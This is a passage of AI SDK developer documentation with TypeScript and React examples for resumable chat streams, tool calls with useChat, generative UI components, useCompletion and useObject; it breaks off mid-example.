title: Chatbot Resume Streams description: Learn how to resume chatbot streams after client disconnects.
Chatbot Resume Streams
useChat supports resuming ongoing streams after page reloads. Use this feature to build applications with long-running generations.
How stream resumption works
Stream resumption requires persistence for messages and active streams in your application. The AI SDK provides tools to connect to storage, but you need to set up the storage yourself.
The AI SDK provides:
- A resume option in useChat that automatically reconnects to active streams
- Access to the outgoing stream through the consumeSseStream callback
- Automatic HTTP requests to your resume endpoints
You build:
- Storage to track which stream belongs to each chat
- Redis to store the UIMessage stream
- Two API endpoints: POST to create streams, GET to resume them
- Integration with resumable-stream to manage Redis storage
Prerequisites
To implement resumable streams in your chat application, you need:
- The resumable-stream package - Handles the publisher/subscriber mechanism for streams
- A Redis instance - Stores stream data (e.g. Redis through Vercel)
- A persistence layer - Tracks which stream ID is active for each chat (e.g. database)
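The examples in this guide assume a small chat-store module (imported as @util/chat-store) that tracks the messages and the active stream ID for each chat. A minimal in-memory sketch of that interface (the ChatRecord shape is an assumption inferred from how readChat and saveChat are used below; replace the Map with your database in practice):
import { UIMessage } from 'ai';
// hypothetical record shape, inferred from the handlers below:
export type ChatRecord = {
id: string;
messages: UIMessage[];
activeStreamId: string | null;
};
const chats = new Map<string, ChatRecord>();
export async function readChat(id: string): Promise<ChatRecord> {
return chats.get(id) ?? { id, messages: [], activeStreamId: null };
}
export async function saveChat({
id,
messages,
activeStreamId,
}: {
id: string;
messages?: UIMessage[];
activeStreamId?: string | null;
}): Promise<void> {
const current = await readChat(id);
chats.set(id, {
...current,
...(messages !== undefined ? { messages } : {}),
...(activeStreamId !== undefined ? { activeStreamId } : {}),
});
}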
Implementation
1. Client-side: Enable stream resumption
Use the resume option in the useChat hook to enable stream resumption. When resume is true, the hook automatically attempts to reconnect to any active stream for the chat on mount:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, type UIMessage } from 'ai';
export function Chat({
chatData,
resume = false,
}: {
chatData: { id: string; messages: UIMessage[] };
resume?: boolean;
}) {
const { messages, sendMessage, status } = useChat({
id: chatData.id,
messages: chatData.messages,
resume, // Enable automatic stream resumption
transport: new DefaultChatTransport({
// You must send the id of the chat
prepareSendMessagesRequest: ({ id, messages }) => {
return {
body: {
id,
message: messages[messages.length - 1],
},
};
},
}),
});
return <div>{/* Your chat UI */}</div>;
}
When you enable resume, the useChat hook makes a GET request to /api/chat/[id]/stream on mount to check for and resume any active streams.
Let's start by creating the POST handler to create the resumable stream.
2. Create the POST handler
The POST handler creates resumable streams using the consumeSseStream callback:
import { readChat, saveChat } from '@util/chat-store';
import {
convertToModelMessages,
generateId,
streamText,
type UIMessage,
} from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';
export async function POST(req: Request) {
const {
message,
id,
}: {
message: UIMessage | undefined;
id: string;
} = await req.json();
const chat = await readChat(id);
let messages = chat.messages;
messages = [...messages, message!];
// Clear any previous active stream and save the user message
saveChat({ id, messages, activeStreamId: null });
const result = streamText({
model: 'openai/gpt-5-mini',
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse({
originalMessages: messages,
generateMessageId: generateId,
onFinish: ({ messages }) => {
// Clear the active stream when finished
saveChat({ id, messages, activeStreamId: null });
},
async consumeSseStream({ stream }) {
const streamId = generateId();
// Create a resumable stream from the SSE stream
const streamContext = createResumableStreamContext({ waitUntil: after });
await streamContext.createNewResumableStream(streamId, () => stream);
// Update the chat with the active stream ID
saveChat({ id, activeStreamId: streamId });
},
});
}
3. Implement the GET handler
Create a GET handler at /api/chat/[id]/stream that:
- Reads the chat ID from the route params
- Loads the chat data to check for an active stream
- Returns 204 (No Content) if no stream is active
- Resumes the existing stream if one is found
import { readChat } from '@util/chat-store';
import { UI_MESSAGE_STREAM_HEADERS } from 'ai';
import { after } from 'next/server';
import { createResumableStreamContext } from 'resumable-stream';
export async function GET(
_: Request,
{ params }: { params: Promise<{ id: string }> },
) {
const { id } = await params;
const chat = await readChat(id);
if (chat.activeStreamId == null) {
// no content response when there is no active stream
return new Response(null, { status: 204 });
}
const streamContext = createResumableStreamContext({
waitUntil: after,
});
return new Response(
await streamContext.resumeExistingStream(chat.activeStreamId),
{ headers: UI_MESSAGE_STREAM_HEADERS },
);
}
How it works
Request lifecycle
The complete lifecycle of a resumable stream:
- Stream creation: When you send a new message, the POST handler uses streamText to generate the response. The consumeSseStream callback creates a resumable stream with a unique ID and stores it in Redis through the resumable-stream package
- Stream tracking: Your persistence layer saves the activeStreamId in the chat data
- Client reconnection: When the client reconnects (page reload), the resume option triggers a GET request to /api/chat/[id]/stream
- Stream recovery: The GET handler checks for an activeStreamId and uses resumeExistingStream to reconnect. If no active stream exists, it returns a 204 (No Content) response
- Completion cleanup: When the stream finishes, the onFinish callback clears the activeStreamId by setting it to null
Customize the resume endpoint
By default, the useChat hook makes a GET request to /api/chat/[id]/stream when resuming. Customize this endpoint, credentials, and headers using the prepareReconnectToStreamRequest option in DefaultChatTransport:
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
export function Chat({ chatData, resume }) {
const { messages, sendMessage } = useChat({
id: chatData.id,
messages: chatData.messages,
resume,
transport: new DefaultChatTransport({
// Customize reconnect settings (optional)
prepareReconnectToStreamRequest: ({ id }) => {
return {
api: `/api/chat/${id}/stream`, // Default pattern
// Or use a different pattern:
// api: `/api/streams/${id}/resume`,
// api: `/api/resume-chat?id=${id}`,
credentials: 'include', // Include cookies/auth
headers: {
Authorization: 'Bearer token',
'X-Custom-Header': 'value',
},
};
},
}),
});
return <div>{/* Your chat UI */}</div>;
}
This lets you:
- Match your existing API route structure
- Add query parameters or custom paths
- Integrate with different backend architectures
Important considerations
- Incompatibility with abort: Stream resumption is not compatible with abort functionality. Closing a tab or refreshing the page triggers an abort signal that will break the resumption mechanism. Do not use resume: true if you need abort functionality in your application
- Stream expiration: Streams in Redis expire after a set time (configurable in the resumable-stream package)
- Multiple clients: Multiple clients can connect to the same stream simultaneously
- Error handling: When no active stream exists, the GET handler returns a 204 (No Content) status code
- Security: Ensure proper authentication and authorization for both creating and resuming streams
- Race conditions: Clear the activeStreamId when starting a new stream to prevent resuming outdated streams
title: Chatbot Tool Usage description: Learn how to use tools with the useChat hook.
Chatbot Tool Usage
With useChat and streamText, you can use tools in your chatbot application.
The AI SDK supports three types of tools in this context:
- Automatically executed server-side tools
- Automatically executed client-side tools
- Tools that require user interaction, such as confirmation dialogs
The flow is as follows:
- The user enters a message in the chat UI.
- The message is sent to the API route.
- In your server-side route, the language model generates tool calls during the streamText call.
- All tool calls are forwarded to the client.
- Server-side tools are executed using their execute method and their results are forwarded to the client.
- Client-side tools that should be automatically executed are handled with the onToolCall callback. You must call addToolOutput to provide the tool result.
- Client-side tools that require user interaction can be displayed in the UI. The tool calls and results are available as tool invocation parts in the parts property of the last assistant message.
- When the user interaction is done, addToolOutput can be used to add the tool result to the chat.
- The chat can be configured to automatically submit when all tool results are available using sendAutomaticallyWhen. This triggers another iteration of this flow.
The tool calls and tool executions are integrated into the assistant message as typed tool parts. A tool part is at first a tool call, and then it becomes a tool result when the tool is executed. The tool result contains all information about the tool call as well as the result of the tool execution.
Example
In this example, we'll use three tools:
- getWeatherInformation: An automatically executed server-side tool that returns the weather in a given city.
- askForConfirmation: A user-interaction client-side tool that asks the user for confirmation.
- getLocation: An automatically executed client-side tool that returns a random city.
API route
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
tools: {
// server-side tool with execute function:
getWeatherInformation: {
description: 'show the weather in a given city to the user',
inputSchema: z.object({ city: z.string() }),
execute: async ({}: { city: string }) => {
const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
return weatherOptions[
Math.floor(Math.random() * weatherOptions.length)
];
},
},
// client-side tool that starts user interaction:
askForConfirmation: {
description: 'Ask the user for confirmation.',
inputSchema: z.object({
message: z.string().describe('The message to ask for confirmation.'),
}),
},
// client-side tool that is automatically executed on the client:
getLocation: {
description:
'Get the user location. Always ask for confirmation before using this tool.',
inputSchema: z.object({}),
},
},
});
return result.toUIMessageStreamResponse();
}
Client-side page
The client-side page uses the useChat hook to create a chatbot application with real-time message streaming.
Tool calls are displayed in the chat UI as typed tool parts.
Please make sure to render the messages using the parts property of the message.
There are three things worth mentioning:
- The onToolCall callback is used to handle client-side tools that should be automatically executed. In this example, the getLocation tool is a client-side tool that returns a random city. You call addToolOutput to provide the result (without await to avoid potential deadlocks).
- The sendAutomaticallyWhen option with the lastAssistantMessageIsCompleteWithToolCalls helper automatically submits when all tool results are available.
- The parts array of assistant messages contains tool parts with typed names like tool-askForConfirmation. The client-side tool askForConfirmation is displayed in the UI. It asks the user for confirmation and displays the result once the user confirms or denies the execution. The result is added to the chat using addToolOutput with the tool parameter for type safety.
'use client';
import { useChat } from '@ai-sdk/react';
import {
DefaultChatTransport,
lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage, addToolOutput } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,
// run client-side tools that are automatically executed:
async onToolCall({ toolCall }) {
// Check if it's a dynamic tool first for proper type narrowing
if (toolCall.dynamic) {
return;
}
if (toolCall.toolName === 'getLocation') {
const cities = ['New York', 'Los Angeles', 'Chicago', 'San Francisco'];
// No await - avoids potential deadlocks
addToolOutput({
tool: 'getLocation',
toolCallId: toolCall.toolCallId,
output: cities[Math.floor(Math.random() * cities.length)],
});
}
},
});
const [input, setInput] = useState('');
return (
<>
{messages?.map(message => (
<div key={message.id}>
<strong>{`${message.role}: `}</strong>
{message.parts.map(part => {
switch (part.type) {
// render text parts as simple text:
case 'text':
return part.text;
// for tool parts, use the typed tool part names:
case 'tool-askForConfirmation': {
const callId = part.toolCallId;
switch (part.state) {
case 'input-streaming':
return (
<div key={callId}>Loading confirmation request...</div>
);
case 'input-available':
return (
<div key={callId}>
{part.input.message}
<div>
<button
onClick={() =>
addToolOutput({
tool: 'askForConfirmation',
toolCallId: callId,
output: 'Yes, confirmed.',
})
}
>
Yes
</button>
<button
onClick={() =>
addToolOutput({
tool: 'askForConfirmation',
toolCallId: callId,
output: 'No, denied',
})
}
>
No
</button>
</div>
</div>
);
case 'output-available':
return (
<div key={callId}>
Location access allowed: {part.output}
</div>
);
case 'output-error':
return <div key={callId}>Error: {part.errorText}</div>;
}
break;
}
case 'tool-getLocation': {
const callId = part.toolCallId;
switch (part.state) {
case 'input-streaming':
return (
<div key={callId}>Preparing location request...</div>
);
case 'input-available':
return <div key={callId}>Getting location...</div>;
case 'output-available':
return <div key={callId}>Location: {part.output}</div>;
case 'output-error':
return (
<div key={callId}>
Error getting location: {part.errorText}
</div>
);
}
break;
}
case 'tool-getWeatherInformation': {
const callId = part.toolCallId;
switch (part.state) {
// example of pre-rendering streaming tool inputs:
case 'input-streaming':
return (
<pre key={callId}>{JSON.stringify(part, null, 2)}</pre>
);
case 'input-available':
return (
<div key={callId}>
Getting weather information for {part.input.city}...
</div>
);
case 'output-available':
return (
<div key={callId}>
Weather in {part.input.city}: {part.output}
</div>
);
case 'output-error':
return (
<div key={callId}>
Error getting weather for {part.input.city}:{' '}
{part.errorText}
</div>
);
}
break;
}
}
})}
<br />
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
}}
>
<input value={input} onChange={e => setInput(e.target.value)} />
</form>
</>
);
}
Error handling
Sometimes an error may occur during client-side tool execution. Use the addToolOutput method with a state of 'output-error' and an errorText value instead of output to record the error.
'use client';
import { useChat } from '@ai-sdk/react';
import {
DefaultChatTransport,
lastAssistantMessageIsCompleteWithToolCalls,
} from 'ai';
import { useState } from 'react';
export default function Chat() {
const { messages, sendMessage, addToolOutput } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
sendAutomaticallyWhen: lastAssistantMessageIsCompleteWithToolCalls,
// run client-side tools that are automatically executed:
async onToolCall({ toolCall }) {
// Check if it's a dynamic tool first for proper type narrowing
if (toolCall.dynamic) {
return;
}
if (toolCall.toolName === 'getWeatherInformation') {
try {
const weather = await getWeatherInformation(toolCall.input);
// No await - avoids potential deadlocks
addToolOutput({
tool: 'getWeatherInformation',
toolCallId: toolCall.toolCallId,
output: weather,
});
} catch (err) {
addToolOutput({
tool: 'getWeatherInformation',
toolCallId: toolCall.toolCallId,
state: 'output-error',
errorText: 'Unable to get the weather information',
});
}
}
},
});
}
Dynamic Tools
When using dynamic tools (tools with unknown types at compile time), the UI parts use a generic dynamic-tool type instead of specific tool types:
{
message.parts.map((part, index) => {
switch (part.type) {
// Static tools with specific (`tool-${toolName}`) types
case 'tool-getWeatherInformation':
return <WeatherDisplay part={part} />;
// Dynamic tools use generic `dynamic-tool` type
case 'dynamic-tool':
return (
<div key={index}>
<h4>Tool: {part.toolName}</h4>
{part.state === 'input-streaming' && (
<pre>{JSON.stringify(part.input, null, 2)}</pre>
)}
{part.state === 'output-available' && (
<pre>{JSON.stringify(part.output, null, 2)}</pre>
)}
{part.state === 'output-error' && (
<div>Error: {part.errorText}</div>
)}
</div>
);
}
});
}
Dynamic tools are useful when integrating with:
- MCP (Model Context Protocol) tools without schemas
- User-defined functions loaded at runtime
- External tool providers
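On the server, such tools can be defined with the dynamicTool helper, which types inputs and outputs as unknown. A minimal sketch (the tool itself is hypothetical):
import { dynamicTool } from 'ai';
import { z } from 'zod';
const customTool = dynamicTool({
description: 'Execute a user-defined function loaded at runtime',
inputSchema: z.object({}),
execute: async input => {
// input is typed as `unknown` for dynamic tools:
return { result: `executed with ${JSON.stringify(input)}` };
},
});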
Tool call streaming
Tool call streaming is enabled by default in AI SDK 5.0, allowing you to stream tool calls while they are being generated. This provides a better user experience by showing tool inputs as they are generated in real-time.
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
// toolCallStreaming is enabled by default in v5
// ...
});
return result.toUIMessageStreamResponse();
}
With tool call streaming enabled, partial tool calls are streamed as part of the data stream.
They are available through the useChat hook.
The typed tool parts of assistant messages will also contain partial tool calls.
You can use the state property of the tool part to render the correct UI.
export default function Chat() {
// ...
return (
<>
{messages?.map(message => (
<div key={message.id}>
{message.parts.map(part => {
switch (part.type) {
case 'tool-askForConfirmation':
case 'tool-getLocation':
case 'tool-getWeatherInformation':
switch (part.state) {
case 'input-streaming':
return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
case 'input-available':
return <pre>{JSON.stringify(part.input, null, 2)}</pre>;
case 'output-available':
return <pre>{JSON.stringify(part.output, null, 2)}</pre>;
case 'output-error':
return <div>Error: {part.errorText}</div>;
}
}
})}
</div>
))}
</>
);
}
Step start parts
When you are using multi-step tool calls, the AI SDK will add step start parts to the assistant messages.
If you want to display boundaries between tool calls, you can use the step-start parts as follows:
// ...
// where you render the message parts:
message.parts.map((part, index) => {
switch (part.type) {
case 'step-start':
// show step boundaries as horizontal lines:
return index > 0 ? (
<div key={index} className="text-gray-500">
<hr className="my-2 border-gray-300" />
</div>
) : null;
case 'text':
// ...
case 'tool-askForConfirmation':
case 'tool-getLocation':
case 'tool-getWeatherInformation':
// ...
}
});
// ...
Server-side Multi-Step Calls
You can also use multi-step calls on the server-side with streamText.
This works when all invoked tools have an execute function on the server side.
import { convertToModelMessages, streamText, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: __MODEL__,
messages: convertToModelMessages(messages),
tools: {
getWeatherInformation: {
description: 'show the weather in a given city to the user',
inputSchema: z.object({ city: z.string() }),
// tool has execute function:
execute: async ({}: { city: string }) => {
const weatherOptions = ['sunny', 'cloudy', 'rainy', 'snowy', 'windy'];
return weatherOptions[
Math.floor(Math.random() * weatherOptions.length)
];
},
},
},
stopWhen: stepCountIs(5),
});
return result.toUIMessageStreamResponse();
}
Errors
Language models can make errors when calling tools. By default, these errors are masked for security reasons, and show up as "An error occurred" in the UI.
To surface the errors, you can use the onError function when calling toUIMessageStreamResponse.
export function errorHandler(error: unknown) {
if (error == null) {
return 'unknown error';
}
if (typeof error === 'string') {
return error;
}
if (error instanceof Error) {
return error.message;
}
return JSON.stringify(error);
}
const result = streamText({
// ...
});
return result.toUIMessageStreamResponse({
onError: errorHandler,
});
In case you are using createUIMessageStream, you can provide the onError function there:
const stream = createUIMessageStream({
// ...
execute: ({ writer }) => {
// ...
},
onError: error =>
`Custom error: ${error instanceof Error ? error.message : String(error)}`,
});
title: Generative User Interfaces description: Learn how to build Generative UI with AI SDK UI.
Generative User Interfaces
Generative user interfaces (generative UI) is the process of allowing a large language model (LLM) to go beyond text and "generate UI". This creates a more engaging and AI-native experience for users.
At the core of generative UI are tools, which are functions you provide to the model to perform specialized tasks like getting the weather in a location. The model can decide when and how to use these tools based on the context of the conversation.
Generative UI is the process of connecting the results of a tool call to a React component. Here's how it works:
- You provide the model with a prompt or conversation history, along with a set of tools.
- Based on the context, the model may decide to call a tool.
- If a tool is called, it will execute and return data.
- This data can then be passed to a React component for rendering.
By passing the tool results to React components, you can create a generative UI experience that's more engaging and adaptive to your needs.
Build a Generative UI Chat Interface
Let's create a chat interface that handles text-based conversations and incorporates dynamic UI elements based on model responses.
Basic Chat Implementation
Start with a basic chat implementation using the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
return null;
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
To handle the chat requests and model responses, set up an API route:
import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const result = streamText({
model: __MODEL__,
system: 'You are a friendly assistant!',
messages: convertToModelMessages(messages),
stopWhen: stepCountIs(5),
});
return result.toUIMessageStreamResponse();
}
This API route uses the streamText function to process chat messages and stream the model's responses back to the client.
Create a Tool
Before enhancing your chat interface with dynamic UI elements, you need to create a tool and corresponding React component. A tool will allow the model to perform a specific action, such as fetching weather information.
Create a new file called ai/tools.ts with the following content:
import { tool as createTool } from 'ai';
import { z } from 'zod';
export const weatherTool = createTool({
description: 'Display the weather for a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async function ({ location }) {
await new Promise(resolve => setTimeout(resolve, 2000));
return { weather: 'Sunny', temperature: 75, location };
},
});
export const tools = {
displayWeather: weatherTool,
};
In this file, you've created a tool called weatherTool. It simulates fetching weather information for a given location and returns the data after a 2-second delay. In a real-world application, you would replace this simulation with an actual API call to a weather service.
Update the API Route
Update the API route to include the tool you've defined:
import { streamText, convertToModelMessages, UIMessage, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
import { tools } from '@/ai/tools';
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const result = streamText({
model: __MODEL__,
system: 'You are a friendly assistant!',
messages: convertToModelMessages(messages),
stopWhen: stepCountIs(5),
tools,
});
return result.toUIMessageStreamResponse();
}
Now that you've defined the tool and added it to your streamText call, let's build a React component to display the weather information it returns.
Create UI Components
Create a new file called components/weather.tsx:
type WeatherProps = {
temperature: number;
weather: string;
location: string;
};
export const Weather = ({ temperature, weather, location }: WeatherProps) => {
return (
<div>
<h2>Current Weather for {location}</h2>
<p>Condition: {weather}</p>
<p>Temperature: {temperature}°C</p>
</div>
);
};
This component will display the weather information for a given location. It takes three props: temperature, weather, and location (exactly what the weatherTool returns).
Render the Weather Component
Now that you have your tool and corresponding React component, let's integrate them into your chat interface. You'll render the Weather component when the model calls the weather tool.
To check if the model has called a tool, you can check the parts array of the UIMessage object for tool-specific parts. In AI SDK 5.0, tool parts use typed naming: tool-${toolName} instead of generic types.
Update your page.tsx file:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role === 'user' ? 'User: ' : 'AI: '}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (part.type === 'tool-displayWeather') {
switch (part.state) {
case 'input-available':
return <div key={index}>Loading weather...</div>;
case 'output-available':
return (
<div key={index}>
<Weather {...part.output} />
</div>
);
case 'output-error':
return <div key={index}>Error: {part.errorText}</div>;
default:
return null;
}
}
return null;
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
value={input}
onChange={e => setInput(e.target.value)}
placeholder="Type a message..."
/>
<button type="submit">Send</button>
</form>
</div>
);
}
In this updated code snippet, you:
- Use manual input state management with useState instead of the built-in input and handleInputChange.
- Use sendMessage instead of handleSubmit to send messages.
- Check the parts array of each message for different content types.
- Handle tool parts with type tool-displayWeather and their different states (input-available, output-available, output-error).
This approach allows you to dynamically render UI components based on the model's responses, creating a more interactive and context-aware chat experience.
Expanding Your Generative UI Application
You can enhance your chat application by adding more tools and components, creating a richer and more versatile user experience. Here's how you can expand your application:
Adding More Tools
To add more tools, simply define them in your ai/tools.ts file:
// Add a new stock tool
export const stockTool = createTool({
description: 'Get price for a stock',
inputSchema: z.object({
symbol: z.string().describe('The stock symbol to get the price for'),
}),
execute: async function ({ symbol }) {
// Simulated API call
await new Promise(resolve => setTimeout(resolve, 2000));
return { symbol, price: 100 };
},
});
// Update the tools object
export const tools = {
displayWeather: weatherTool,
getStockPrice: stockTool,
};
Now, create a new file called components/stock.tsx:
type StockProps = {
price: number;
symbol: string;
};
export const Stock = ({ price, symbol }: StockProps) => {
return (
<div>
<h2>Stock Information</h2>
<p>Symbol: {symbol}</p>
<p>Price: ${price}</p>
</div>
);
};
Finally, update your page.tsx file to include the new Stock component:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import { Weather } from '@/components/weather';
import { Stock } from '@/components/stock';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
};
return (
<div>
{messages.map(message => (
<div key={message.id}>
<div>{message.role}</div>
<div>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={index}>{part.text}</span>;
}
if (part.type === 'tool-displayWeather') {
switch (part.state) {
case 'input-available':
return <div key={index}>Loading weather...</div>;
case 'output-available':
return (
<div key={index}>
<Weather {...part.output} />
</div>
);
case 'output-error':
return <div key={index}>Error: {part.errorText}</div>;
default:
return null;
}
}
if (part.type === 'tool-getStockPrice') {
switch (part.state) {
case 'input-available':
return <div key={index}>Loading stock price...</div>;
case 'output-available':
return (
<div key={index}>
<Stock {...part.output} />
</div>
);
case 'output-error':
return <div key={index}>Error: {part.errorText}</div>;
default:
return null;
}
}
return null;
})}
</div>
</div>
))}
<form onSubmit={handleSubmit}>
<input
type="text"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Send</button>
</form>
</div>
);
}
By following this pattern, you can continue to add more tools and components, expanding the capabilities of your Generative UI application.
title: Completion description: Learn how to use the useCompletion hook.
Completion
The useCompletion hook allows you to create a user interface to handle text completions in your application. It enables the streaming of text completions from your AI provider, manages the state for chat input, and updates the UI automatically as new messages are received.
In this guide, you will learn how to use the useCompletion hook in your application to generate text completions and stream them in real-time to your users.
Example
'use client';
import { useCompletion } from '@ai-sdk/react';
export default function Page() {
const { completion, input, handleInputChange, handleSubmit } = useCompletion({
api: '/api/completion',
});
return (
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={handleInputChange}
id="input"
/>
<button type="submit">Submit</button>
<div>{completion}</div>
</form>
);
}
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { prompt }: { prompt: string } = await req.json();
const result = streamText({
model: __MODEL__,
prompt,
});
return result.toUIMessageStreamResponse();
}
In the Page component, the useCompletion hook will send a request to your AI provider endpoint whenever the user submits a message. The completion is then streamed back in real-time and displayed in the UI.
This enables a seamless text completion experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.
Customized UI
useCompletion also provides ways to manage the prompt via code, show loading and error states, and update the completion without it being triggered by user interactions.
Loading and error states
To show a loading spinner while the completion is being generated, you can use the isLoading state returned by the useCompletion hook:
const { isLoading, ... } = useCompletion()
return (
<>
{isLoading ? <Spinner /> : null}
</>
)
Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or show a toast notification:
const { error, ... } = useCompletion()
useEffect(() => {
if (error) {
toast.error(error.message)
}
}, [error])
// Or display the error message in the UI:
return (
<>
{error ? <div>{error.message}</div> : null}
</>
)
Controlled input
In the initial example, we have handleSubmit and handleInputChange callbacks that manage the input changes and form submissions. These are handy for common use cases, but you can also take finer-grained control for more advanced scenarios such as form validation or customized components.
The following example demonstrates how to use more granular APIs like setInput with your custom input and submit button components:
const { input, setInput } = useCompletion();
return (
<>
<MyCustomInput value={input} onChange={value => setInput(value)} />
</>
);
Cancelation
It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useCompletion hook.
const { stop, isLoading, ... } = useCompletion()
return (
<>
<button onClick={stop} disabled={!isLoading}>Stop</button>
</>
)
When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your application.
Throttling UI Updates
This feature is currently only available for React.
By default, the useCompletion hook will trigger a render every time a new chunk is received.
You can throttle the UI updates with the experimental_throttle option.
const { completion, ... } = useCompletion({
// Throttle the completion and data updates to 50ms:
experimental_throttle: 50
})
Event Callbacks
useCompletion also provides optional event callbacks that you can use to handle different stages of the completion lifecycle. These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.
const { ... } = useCompletion({
onResponse: (response: Response) => {
console.log('Received response from server:', response)
},
onFinish: (prompt: string, completion: string) => {
console.log('Finished streaming completion:', completion)
},
onError: (error: Error) => {
console.error('An error occurred:', error)
},
})
It's worth noting that you can abort the processing by throwing an error in the onResponse callback. This will trigger the onError callback and stop the message from being appended to the chat UI. This can be useful for handling unexpected responses from the AI provider.
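For example, a minimal sketch (using the /api/completion endpoint from above) that rejects unexpected responses before any completion text is appended:
const { completion } = useCompletion({
  api: '/api/completion',
  onResponse: (response: Response) => {
    // Throwing here aborts processing and triggers the onError callback
    if (!response.ok) {
      throw new Error(`Unexpected status code: ${response.status}`);
    }
  },
  onError: error => {
    console.error(error);
  },
});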
Configure Request Options
By default, the useCompletion hook sends an HTTP POST request to the /api/completion endpoint with the prompt as part of the request body. You can customize the request by passing additional options to the useCompletion hook:
const { completion, input, handleInputChange, handleSubmit } = useCompletion({
api: '/api/custom-completion',
headers: {
Authorization: 'your_token',
},
body: {
user_id: '123',
},
credentials: 'same-origin',
});
In this example, the useCompletion hook sends a POST request to the /api/custom-completion endpoint with the specified headers, additional body fields, and credentials for that fetch request. On the server side, you can handle the request using this additional information.
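As a rough sketch of the matching server handler (assuming the /api/custom-completion route and the user_id body field from above), you can read the extra field from the request body:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
  // user_id is the additional body field sent by the hook above
  const { prompt, user_id }: { prompt: string; user_id: string } =
    await req.json();
  console.log('Completion requested by user:', user_id);
  const result = streamText({
    model: __MODEL__,
    prompt,
  });
  return result.toUIMessageStreamResponse();
}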
title: Object Generation description: Learn how to use the useObject hook.
Object Generation
The useObject hook allows you to create interfaces that represent a structured JSON object that is being streamed.
In this guide, you will learn how to use the useObject hook in your application to generate UIs for structured data on the fly.
Example
The example shows a small notifications demo app that generates fake notifications in real-time.
Schema
It is helpful to set up the schema in a separate file that is imported on both the client and server.
import { z } from 'zod';
// define a schema for the notifications
export const notificationSchema = z.object({
notifications: z.array(
z.object({
name: z.string().describe('Name of a fictional person.'),
message: z.string().describe('Message. Do not use emojis or links.'),
}),
),
});
Client
The client uses useObject to stream the object generation process.
The results are partial and are displayed as they are received.
Please note the code for handling undefined values in the JSX.
'use client';
import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';
export default function Page() {
const { object, submit } = useObject({
api: '/api/notifications',
schema: notificationSchema,
});
return (
<>
<button onClick={() => submit('Messages during finals week.')}>
Generate notifications
</button>
{object?.notifications?.map((notification, index) => (
<div key={index}>
<p>{notification?.name}</p>
<p>{notification?.message}</p>
</div>
))}
</>
);
}
Server
On the server, we use streamObject to stream the object generation process.
import { streamObject } from 'ai';
__PROVIDER_IMPORT__;
import { notificationSchema } from './schema';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const context = await req.json();
const result = streamObject({
model: __MODEL__,
